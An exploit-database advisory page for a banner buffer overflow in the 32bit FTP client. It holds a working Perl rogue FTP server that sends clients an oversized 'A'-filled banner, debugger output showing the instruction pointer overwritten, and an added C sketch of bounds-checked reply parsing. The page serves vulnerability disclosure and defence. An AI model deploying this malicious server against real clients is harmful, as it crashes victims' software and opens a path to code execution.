32bit FTP (09.04.24) Banner Remote Buffer Overflow PoC

2009-05-11 / 2009-05-12
Credit: electrasoft
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#! /usr/bin/perl
#
# A client side vulnerability in the product allows remote servers to cause the client to crash by sending it a large banner.
# By: Load 99%
#
# website: http://www.electrasoft.com/32ftp.htm
# Version:09.04.24
#
#0:005> g
# ...
#(9b0.bac): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=41414141 ebx=00000001 ecx=000013e7 edx=0382ec14 esi=fffffffe edi=00000000
#eip=41414141 esp=0382f018 ebp=0382f050 iopl=0 nv up ei pl nz na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
#41414141 ?? ???
#
use IO::Socket::INET;
my $socket = IO::Socket::INET->new('LocalPort' => 21, 'Proto' => 'tcp', 'Listen' => SOMAXCONN)
    or die "Can't create socket ($!)\n";
print "Server listening\n";
$data = "220 ".("\x41" x 5060)."\r\n";
while (my $client = $socket->accept) {
    print "send> data.\n";
    print $client $data;
}
die "Can't accept socket ($!)\n";
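Mitigation sketch, added here as an example and not taken from the advisory or from the vendor's code (the client's own banner handling is not shown on this page): a reply-line parser in C that checks every length against the destination buffer, which is the check whose absence CWE-119 describes. The names `parse_reply_line` and `build_banner` and the 512-byte `REPLY_MAX` cap are assumptions made for the illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define REPLY_MAX 512 /* assumed cap on one reply line; not a value from the page */

enum { REPLY_OK = 0, REPLY_INCOMPLETE = -1, REPLY_TOO_LONG = -2, REPLY_MALFORMED = -3 };

/* Copy one CRLF-terminated reply line from rx[0..rx_len) into out[0..out_cap)
 * and store its 3-digit code in *code. Every write is checked against out_cap. */
int parse_reply_line(const char *rx, size_t rx_len, char *out, size_t out_cap, int *code)
{
    size_t scan = rx_len < REPLY_MAX ? rx_len : REPLY_MAX;
    const char *nl = memchr(rx, '\n', scan);
    if (nl == NULL) /* no terminator yet: wait for more data, or give up at the cap */
        return rx_len >= REPLY_MAX ? REPLY_TOO_LONG : REPLY_INCOMPLETE;
    size_t len = (size_t)(nl - rx);
    if (len > 0 && rx[len - 1] == '\r')
        len--;
    if (len + 1 > out_cap) /* text plus NUL must fit the destination */
        return REPLY_TOO_LONG;
    if (len < 3 || !isdigit((unsigned char)rx[0]) || !isdigit((unsigned char)rx[1]) ||
        !isdigit((unsigned char)rx[2]))
        return REPLY_MALFORMED;
    memcpy(out, rx, len);
    out[len] = '\0';
    *code = (rx[0] - '0') * 100 + (rx[1] - '0') * 10 + (rx[2] - '0');
    return REPLY_OK;
}

/* Constructed input: "220 " + n filler bytes + CRLF, the shape the PoC sends. */
size_t build_banner(char *buf, size_t cap, size_t n)
{
    if (n + 6 > cap)
        return 0;
    memcpy(buf, "220 ", 4);
    memset(buf + 4, 'A', n);
    memcpy(buf + 4 + n, "\r\n", 2);
    return n + 6;
}

int main(void)
{
    static char rx[8192];
    char line[128];
    int code = 0;
    size_t n = build_banner(rx, sizeof rx, 5060);
    printf("5060-byte banner -> %d\n", parse_reply_line(rx, n, line, sizeof line, &code));
    printf("normal banner    -> %d\n", parse_reply_line("220 ready\r\n", 11, line, sizeof line, &code));
    return 0;
}
```

A caller that gets `REPLY_TOO_LONG` should close the connection rather than truncate and continue, since the rest of the oversized line would otherwise be parsed as further replies.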

References:

http://www.securityfocus.com/bid/34822
http://www.milw0rm.com/exploits/8614
http://www.milw0rm.com/exploits/8611



Copyright 2024, cxsecurity.com

 
